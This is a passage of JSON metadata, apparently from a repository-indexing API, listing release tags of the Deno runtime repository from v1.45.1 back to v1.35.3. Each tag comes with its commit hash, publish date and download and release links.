,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno